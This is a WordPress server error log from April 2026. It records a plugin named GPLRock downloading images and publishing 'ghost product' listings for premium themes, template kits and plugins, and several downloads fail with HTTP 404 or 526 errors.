/home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-3a5fc2a1.jpg [05-Apr-2026 04:07:50 UTC] GPLRock: Using pre-downloaded image for product voltech-tech-digital-startup-company-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-3a5fc2a1.jpg [05-Apr-2026 04:07:50 UTC] GPLRock: Ghost product published with image - Product ID: voltech-tech-digital-startup-company-elementor-template-kit [05-Apr-2026 04:07:51 UTC] GPLRock: Image downloaded successfully for product vixus-business-startup-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-8d8a2bed.webp [05-Apr-2026 04:07:51 UTC] GPLRock: Using pre-downloaded image for product vixus-business-startup-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-8d8a2bed.webp [05-Apr-2026 04:07:51 UTC] GPLRock: Ghost product published with image - Product ID: vixus-business-startup-elementor-template-kit [05-Apr-2026 04:07:52 UTC] GPLRock: Image downloaded successfully for product vitech-technology-it-solution-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-64e681ef.webp [05-Apr-2026 04:07:52 UTC] GPLRock: Using pre-downloaded image for product vitech-technology-it-solution-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-64e681ef.webp [05-Apr-2026 04:07:52 UTC] GPLRock: Ghost product published with image - Product ID: vitech-technology-it-solution-elementor-template-kit [05-Apr-2026 04:07:54 UTC] GPLRock: Image downloaded successfully for product vitameals-fruits-vegetables-store-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-6e691736.webp [05-Apr-2026 04:07:54 UTC] GPLRock: Using pre-downloaded image for product vitameals-fruits-vegetables-store-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-6e691736.webp [05-Apr-2026 04:07:54 UTC] GPLRock: Ghost product published with image - Product ID: vitameals-fruits-vegetables-store-elementor-template-kit [05-Apr-2026 04:07:55 UTC] GPLRock: Image downloaded successfully for product vitae-cv-resume-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-e2df82cf.webp [05-Apr-2026 04:07:55 UTC] GPLRock: Using pre-downloaded image for product vitae-cv-resume-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-e2df82cf.webp [05-Apr-2026 04:07:55 UTC] GPLRock: Ghost product published with image - Product ID: vitae-cv-resume-elementor-template-kit [05-Apr-2026 04:10:15 UTC] GPLRock: Image download failed for product minera-minimalist-woocommerce-wordpress-theme (attempt 1/3). HTTP Code: 404, Error: . Retrying... [05-Apr-2026 04:10:19 UTC] GPLRock: Image download failed for product minera-minimalist-woocommerce-wordpress-theme (attempt 2/3). HTTP Code: 404, Error: . Retrying... [05-Apr-2026 04:10:23 UTC] GPLRock Error: Failed to download image from https://www.gplrock.com/wp-content/uploads/2021/09/Minera-Minimalist-WooCommerce-WordPress-Theme.jpg for product minera-minimalist-woocommerce-wordpress-theme after 3 attempts. HTTP Code: 404, Error: [05-Apr-2026 04:10:25 UTC] GPLRock: Image download failed for product minera-minimalist-woocommerce-wordpress-theme (attempt 1/3). HTTP Code: 404, Error: . Retrying... [05-Apr-2026 04:10:29 UTC] GPLRock: Image download failed for product minera-minimalist-woocommerce-wordpress-theme (attempt 2/3). HTTP Code: 404, Error: . Retrying... [05-Apr-2026 04:10:33 UTC] GPLRock Error: Failed to download image from https://www.gplrock.com/wp-content/uploads/2021/09/Minera-Minimalist-WooCommerce-WordPress-Theme.jpg for product minera-minimalist-woocommerce-wordpress-theme after 3 attempts. HTTP Code: 404, Error: [05-Apr-2026 04:10:33 UTC] GPLRock WARNING: Image download failed for product minera-minimalist-woocommerce-wordpress-theme. URL: https://www.gplrock.com/wp-content/uploads/2021/09/Minera-Minimalist-WooCommerce-WordPress-Theme.jpg [05-Apr-2026 04:10:33 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: minera-minimalist-woocommerce-wordpress-theme [05-Apr-2026 04:10:35 UTC] GPLRock: Image downloaded successfully for product mythemeshop-steadyincome-wordpress-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-7b703e0d.jpg [05-Apr-2026 04:10:35 UTC] GPLRock: Using pre-downloaded image for product mythemeshop-steadyincome-wordpress-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-7b703e0d.jpg [05-Apr-2026 04:10:35 UTC] GPLRock: Ghost product published with image - Product ID: mythemeshop-steadyincome-wordpress-theme [05-Apr-2026 04:10:37 UTC] GPLRock: Image downloaded successfully for product wp-rich-snippets-front-end-entry-submit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-0632d581.jpg [05-Apr-2026 04:10:37 UTC] GPLRock: Using pre-downloaded image for product wp-rich-snippets-front-end-entry-submit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-0632d581.jpg [05-Apr-2026 04:10:37 UTC] GPLRock: Ghost product published with image - Product ID: wp-rich-snippets-front-end-entry-submit [05-Apr-2026 04:10:38 UTC] GPLRock: Image downloaded successfully for product themify-event-wordpress-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-1a42790c.jpg [05-Apr-2026 04:10:38 UTC] GPLRock: Using pre-downloaded image for product themify-event-wordpress-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-1a42790c.jpg [05-Apr-2026 04:10:38 UTC] GPLRock: Ghost product published with image - Product ID: themify-event-wordpress-theme [05-Apr-2026 04:10:40 UTC] GPLRock: Image downloaded successfully for product css-igniter-paperbag-wordpress-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-16a28bbe.jpg [05-Apr-2026 04:10:40 UTC] GPLRock: Using pre-downloaded image for product css-igniter-paperbag-wordpress-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-16a28bbe.jpg [05-Apr-2026 04:10:40 UTC] GPLRock: Ghost product published with image - Product ID: css-igniter-paperbag-wordpress-theme [05-Apr-2026 04:10:41 UTC] GPLRock: Image downloaded successfully for product ithemes-sales-accelerator-inventory (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-bc5ad3bf.jpg [05-Apr-2026 04:10:42 UTC] GPLRock: Using pre-downloaded image for product ithemes-sales-accelerator-inventory: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-bc5ad3bf.jpg [05-Apr-2026 04:10:42 UTC] GPLRock: Ghost product published with image - Product ID: ithemes-sales-accelerator-inventory [05-Apr-2026 04:10:43 UTC] GPLRock: Image downloaded successfully for product centum-responsive-wordpress-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-89e8703d.jpg [05-Apr-2026 04:10:43 UTC] GPLRock: Using pre-downloaded image for product centum-responsive-wordpress-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-89e8703d.jpg [05-Apr-2026 04:10:43 UTC] GPLRock: Ghost product published with image - Product ID: centum-responsive-wordpress-theme [05-Apr-2026 04:10:45 UTC] GPLRock: Image downloaded successfully for product ultimate-member-terms-conditions-addon (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-29a676ee.jpg [05-Apr-2026 04:10:45 UTC] GPLRock: Using pre-downloaded image for product ultimate-member-terms-conditions-addon: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-29a676ee.jpg [05-Apr-2026 04:10:45 UTC] GPLRock: Ghost product published with image - Product ID: ultimate-member-terms-conditions-addon [05-Apr-2026 04:10:47 UTC] GPLRock: Image downloaded successfully for product yith-socute-multi-purpose-e-commerce-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-7446de2e.jpg [05-Apr-2026 04:10:47 UTC] GPLRock: Using pre-downloaded image for product yith-socute-multi-purpose-e-commerce-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-7446de2e.jpg [05-Apr-2026 04:10:47 UTC] GPLRock: Ghost product published with image - Product ID: yith-socute-multi-purpose-e-commerce-theme [05-Apr-2026 04:10:48 UTC] GPLRock: Image downloaded successfully for product facetwp-caching (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-a5982b77.jpg [05-Apr-2026 04:10:48 UTC] GPLRock: Using pre-downloaded image for product facetwp-caching: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-a5982b77.jpg [05-Apr-2026 04:10:48 UTC] GPLRock: Ghost product published with image - Product ID: facetwp-caching [05-Apr-2026 04:12:04 UTC] GPLRock: Image downloaded successfully for product vetrio-veterinary-clinic-pet-care-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-1532464d.jpg [05-Apr-2026 04:12:04 UTC] GPLRock: Using pre-downloaded image for product vetrio-veterinary-clinic-pet-care-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-1532464d.jpg [05-Apr-2026 04:12:04 UTC] GPLRock: Ghost product published with image - Product ID: vetrio-veterinary-clinic-pet-care-elementor-template-kit [05-Apr-2026 04:12:05 UTC] GPLRock: Image downloaded successfully for product verra-skincare-dermatology-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-a8972c1a.webp [05-Apr-2026 04:12:05 UTC] GPLRock: Using pre-downloaded image for product verra-skincare-dermatology-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-a8972c1a.webp [05-Apr-2026 04:12:05 UTC] GPLRock: Ghost product published with image - Product ID: verra-skincare-dermatology-elementor-template-kit [05-Apr-2026 04:12:06 UTC] GPLRock: Image downloaded successfully for product verina-mental-health-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-bb6a59fd.webp [05-Apr-2026 04:12:07 UTC] GPLRock: Using pre-downloaded image for product verina-mental-health-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-bb6a59fd.webp [05-Apr-2026 04:12:07 UTC] GPLRock: Ghost product published with image - Product ID: verina-mental-health-elementor-template-kit [05-Apr-2026 04:12:08 UTC] GPLRock: Image downloaded successfully for product venturr-venture-capital-investment-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-b90f77a2.jpg [05-Apr-2026 04:12:08 UTC] GPLRock: Using pre-downloaded image for product venturr-venture-capital-investment-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-b90f77a2.jpg [05-Apr-2026 04:12:08 UTC] GPLRock: Ghost product published with image - Product ID: venturr-venture-capital-investment-elementor-template-kit [05-Apr-2026 04:12:10 UTC] GPLRock: Image downloaded successfully for product vento-event-organizer-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-c487c239.webp [05-Apr-2026 04:12:10 UTC] GPLRock: Using pre-downloaded image for product vento-event-organizer-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-c487c239.webp [05-Apr-2026 04:12:10 UTC] GPLRock: Ghost product published with image - Product ID: vento-event-organizer-elementor-template-kit [05-Apr-2026 04:12:11 UTC] GPLRock: Image downloaded successfully for product venexy-lawyer-elementor-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-71614f54.webp [05-Apr-2026 04:12:11 UTC] GPLRock: Using pre-downloaded image for product venexy-lawyer-elementor-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-71614f54.webp [05-Apr-2026 04:12:11 UTC] GPLRock: Ghost product published with image - Product ID: venexy-lawyer-elementor-kit [05-Apr-2026 04:12:13 UTC] GPLRock: Image downloaded successfully for product veloza-influencer-talent-agency-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-e3670f94.webp [05-Apr-2026 04:12:13 UTC] GPLRock: Using pre-downloaded image for product veloza-influencer-talent-agency-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-e3670f94.webp [05-Apr-2026 04:12:13 UTC] GPLRock: Ghost product published with image - Product ID: veloza-influencer-talent-agency-elementor-template-kit [05-Apr-2026 04:12:14 UTC] GPLRock: Image downloaded successfully for product veggie-organic-food-eco-online-store-products-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-7260e251.webp [05-Apr-2026 04:12:14 UTC] GPLRock: Using pre-downloaded image for product veggie-organic-food-eco-online-store-products-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-7260e251.webp [05-Apr-2026 04:12:14 UTC] GPLRock: Ghost product published with image - Product ID: veggie-organic-food-eco-online-store-products-template-kit [05-Apr-2026 04:12:15 UTC] GPLRock: Image downloaded successfully for product vegan-restaurant-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-c86cc876.webp [05-Apr-2026 04:12:15 UTC] GPLRock: Using pre-downloaded image for product vegan-restaurant-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-c86cc876.webp [05-Apr-2026 04:12:15 UTC] GPLRock: Ghost product published with image - Product ID: vegan-restaurant-elementor-template-kit [05-Apr-2026 04:12:17 UTC] GPLRock: Image downloaded successfully for product veerena-honey-bee-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-9ee6ff11.webp [05-Apr-2026 04:12:17 UTC] GPLRock: Using pre-downloaded image for product veerena-honey-bee-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-9ee6ff11.webp [05-Apr-2026 04:12:17 UTC] GPLRock: Ghost product published with image - Product ID: veerena-honey-bee-elementor-template-kit [05-Apr-2026 04:14:05 UTC] GPLRock: Image downloaded successfully for product wp-menufic-responsive-sliding-menu-with-sticky-bar-logo-e-mail-and-click-to-call (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-f54cf793.webp [05-Apr-2026 04:14:05 UTC] GPLRock: Using pre-downloaded image for product wp-menufic-responsive-sliding-menu-with-sticky-bar-logo-e-mail-and-click-to-call: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-f54cf793.webp [05-Apr-2026 04:14:05 UTC] GPLRock: Ghost product published with image - Product ID: wp-menufic-responsive-sliding-menu-with-sticky-bar-logo-e-mail-and-click-to-call [05-Apr-2026 04:14:05 UTC] GPLRock: Image download failed for product paypal-for-nex-forms (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 04:14:07 UTC] GPLRock: Image download failed for product paypal-for-nex-forms (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 04:14:09 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/paypal-for-nex-forms-14022.webp for product paypal-for-nex-forms after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 04:14:09 UTC] GPLRock: Image download failed for product paypal-for-nex-forms (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 04:14:11 UTC] GPLRock: Image download failed for product paypal-for-nex-forms (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 04:14:13 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/paypal-for-nex-forms-14022.webp for product paypal-for-nex-forms after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 04:14:13 UTC] GPLRock WARNING: Image download failed for product paypal-for-nex-forms. URL: https://meldwp.com/wp-content/uploads/paypal-for-nex-forms-14022.webp [05-Apr-2026 04:14:13 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: paypal-for-nex-forms [05-Apr-2026 04:14:13 UTC] GPLRock: Image download failed for product essential-addons-bundle-for-elementor-page-builder (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 04:14:16 UTC] GPLRock: Image download failed for product essential-addons-bundle-for-elementor-page-builder (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 04:14:18 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/essential-addons-bundle-for-elementor-page-builder-8722.webp for product essential-addons-bundle-for-elementor-page-builder after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 04:14:18 UTC] GPLRock: Image download failed for product essential-addons-bundle-for-elementor-page-builder (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 04:14:20 UTC] GPLRock: Image download failed for product essential-addons-bundle-for-elementor-page-builder (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 04:14:22 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/essential-addons-bundle-for-elementor-page-builder-8722.webp for product essential-addons-bundle-for-elementor-page-builder after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 04:14:22 UTC] GPLRock WARNING: Image download failed for product essential-addons-bundle-for-elementor-page-builder. URL: https://meldwp.com/wp-content/uploads/essential-addons-bundle-for-elementor-page-builder-8722.webp [05-Apr-2026 04:14:22 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: essential-addons-bundle-for-elementor-page-builder [05-Apr-2026 04:14:22 UTC] GPLRock: Image download failed for product email-customizer-for-woocommerce-wcmail (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 04:14:24 UTC] GPLRock: Image download failed for product email-customizer-for-woocommerce-wcmail (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 04:14:26 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/email-customizer-for-woocommerce---wcmail-4622.webp for product email-customizer-for-woocommerce-wcmail after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 04:14:26 UTC] GPLRock: Image download failed for product email-customizer-for-woocommerce-wcmail (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 04:14:29 UTC] GPLRock: Image download failed for product email-customizer-for-woocommerce-wcmail (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 04:14:31 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/email-customizer-for-woocommerce---wcmail-4622.webp for product email-customizer-for-woocommerce-wcmail after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 04:14:31 UTC] GPLRock WARNING: Image download failed for product email-customizer-for-woocommerce-wcmail. URL: https://meldwp.com/wp-content/uploads/email-customizer-for-woocommerce---wcmail-4622.webp [05-Apr-2026 04:14:31 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: email-customizer-for-woocommerce-wcmail [05-Apr-2026 04:14:31 UTC] GPLRock: Image downloaded successfully for product crypto-portfolio-tracker-wordpress-plugin (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-44f1bbf0.webp [05-Apr-2026 04:14:31 UTC] GPLRock: Using pre-downloaded image for product crypto-portfolio-tracker-wordpress-plugin: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-44f1bbf0.webp [05-Apr-2026 04:14:31 UTC] GPLRock: Ghost product published with image - Product ID: crypto-portfolio-tracker-wordpress-plugin [05-Apr-2026 04:14:31 UTC] GPLRock: Image download failed for product osteo-countdown-for-elementor (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 04:14:33 UTC] GPLRock: Image download failed for product osteo-countdown-for-elementor (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 04:14:35 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/osteo-countdown-for-elementor-22007.webp for product osteo-countdown-for-elementor after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 04:14:35 UTC] GPLRock: Image download failed for product osteo-countdown-for-elementor (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 04:14:37 UTC] GPLRock: Image download failed for product osteo-countdown-for-elementor (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 04:14:39 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/osteo-countdown-for-elementor-22007.webp for product osteo-countdown-for-elementor after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 04:14:39 UTC] GPLRock WARNING: Image download failed for product osteo-countdown-for-elementor. URL: https://meldwp.com/wp-content/uploads/osteo-countdown-for-elementor-22007.webp [05-Apr-2026 04:14:39 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: osteo-countdown-for-elementor [05-Apr-2026 04:14:40 UTC] GPLRock: Image download failed for product active-ecommerce-seller-app (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 04:14:42 UTC] GPLRock: Image download failed for product active-ecommerce-seller-app (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 04:14:44 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/active-ecommerce-seller-app-12789.webp for product active-ecommerce-seller-app after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 04:14:44 UTC] GPLRock: Image download failed for product active-ecommerce-seller-app (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 04:14:46 UTC] GPLRock: Image download failed for product active-ecommerce-seller-app (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 04:14:48 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/active-ecommerce-seller-app-12789.webp for product active-ecommerce-seller-app after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 04:14:48 UTC] GPLRock WARNING: Image download failed for product active-ecommerce-seller-app. URL: https://meldwp.com/wp-content/uploads/active-ecommerce-seller-app-12789.webp [05-Apr-2026 04:14:48 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: active-ecommerce-seller-app [05-Apr-2026 04:14:48 UTC] GPLRock: Image download failed for product snapscan-payment-gateway-for-woocommerce (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 04:14:50 UTC] GPLRock: Image download failed for product snapscan-payment-gateway-for-woocommerce (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 04:14:53 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/snapscan-payment-gateway-for-woocommerce-29933.webp for product snapscan-payment-gateway-for-woocommerce after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 04:14:53 UTC] GPLRock: Image download failed for product snapscan-payment-gateway-for-woocommerce (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 04:14:55 UTC] GPLRock: Image download failed for product snapscan-payment-gateway-for-woocommerce (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 04:14:57 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/snapscan-payment-gateway-for-woocommerce-29933.webp for product snapscan-payment-gateway-for-woocommerce after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 04:14:57 UTC] GPLRock WARNING: Image download failed for product snapscan-payment-gateway-for-woocommerce. URL: https://meldwp.com/wp-content/uploads/snapscan-payment-gateway-for-woocommerce-29933.webp [05-Apr-2026 04:14:57 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: snapscan-payment-gateway-for-woocommerce [05-Apr-2026 04:14:57 UTC] GPLRock: Image download failed for product mauikit-xaml-ui-templates-for-net-maui (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 04:14:59 UTC] GPLRock: Image download failed for product mauikit-xaml-ui-templates-for-net-maui (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 04:15:01 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/mauikit---xaml-ui-templates-for-net-maui-10793.webp for product mauikit-xaml-ui-templates-for-net-maui after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 04:15:01 UTC] GPLRock: Image download failed for product mauikit-xaml-ui-templates-for-net-maui (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 04:15:03 UTC] GPLRock: Image download failed for product mauikit-xaml-ui-templates-for-net-maui (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 04:15:06 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/mauikit---xaml-ui-templates-for-net-maui-10793.webp for product mauikit-xaml-ui-templates-for-net-maui after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 04:15:06 UTC] GPLRock WARNING: Image download failed for product mauikit-xaml-ui-templates-for-net-maui. URL: https://meldwp.com/wp-content/uploads/mauikit---xaml-ui-templates-for-net-maui-10793.webp [05-Apr-2026 04:15:06 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: mauikit-xaml-ui-templates-for-net-maui [05-Apr-2026 04:15:06 UTC] GPLRock: Image download failed for product pos-module-for-stock-manager-advance (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 04:15:08 UTC] GPLRock: Image download failed for product pos-module-for-stock-manager-advance (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 04:15:10 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/pos-module-for-stock-manager-advance-17912.webp for product pos-module-for-stock-manager-advance after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 04:15:10 UTC] GPLRock: Image download failed for product pos-module-for-stock-manager-advance (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 04:15:12 UTC] GPLRock: Image download failed for product pos-module-for-stock-manager-advance (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 04:15:14 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/pos-module-for-stock-manager-advance-17912.webp for product pos-module-for-stock-manager-advance after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 04:15:14 UTC] GPLRock WARNING: Image download failed for product pos-module-for-stock-manager-advance. URL: https://meldwp.com/wp-content/uploads/pos-module-for-stock-manager-advance-17912.webp [05-Apr-2026 04:15:14 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: pos-module-for-stock-manager-advance [05-Apr-2026 04:16:09 UTC] GPLRock: Image download failed for product ouioui-multi-vendor-marketplace-elementor-woocommerce-theme (attempt 1/3). HTTP Code: 404, Error: . Retrying... [05-Apr-2026 04:16:13 UTC] GPLRock: Image download failed for product ouioui-multi-vendor-marketplace-elementor-woocommerce-theme (attempt 2/3). HTTP Code: 404, Error: . Retrying... [05-Apr-2026 04:16:17 UTC] GPLRock Error: Failed to download image from https://www.gplrock.com/wp-content/uploads/2023/12/OuiOui-Multi-Vendor-MarketPlace-Elementor-WooCommerce-Theme.jpg for product ouioui-multi-vendor-marketplace-elementor-woocommerce-theme after 3 attempts. HTTP Code: 404, Error: [05-Apr-2026 04:16:20 UTC] GPLRock: Image download failed for product ouioui-multi-vendor-marketplace-elementor-woocommerce-theme (attempt 1/3). HTTP Code: 404, Error: . Retrying... [05-Apr-2026 04:26:17 UTC] GPLRock: Image downloaded successfully for product car-dealer-automotive-wordpress-theme-responsive (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-890392be.jpg [05-Apr-2026 04:26:17 UTC] GPLRock: Using pre-downloaded image for product car-dealer-automotive-wordpress-theme-responsive: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-890392be.jpg [05-Apr-2026 04:26:17 UTC] GPLRock: Ghost product published with image - Product ID: car-dealer-automotive-wordpress-theme-responsive [05-Apr-2026 04:26:19 UTC] GPLRock: Image downloaded successfully for product book-your-travel-online-booking-wordpress-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-5db54467.jpg [05-Apr-2026 04:26:19 UTC] GPLRock: Using pre-downloaded image for product book-your-travel-online-booking-wordpress-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-5db54467.jpg [05-Apr-2026 04:26:19 UTC] GPLRock: Ghost product published with image - Product ID: book-your-travel-online-booking-wordpress-theme [05-Apr-2026 04:26:20 UTC] GPLRock: Image downloaded successfully for product yith-woocommerce-review-reminder-premium (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-9db7f648.jpg [05-Apr-2026 04:26:20 UTC] GPLRock: Using 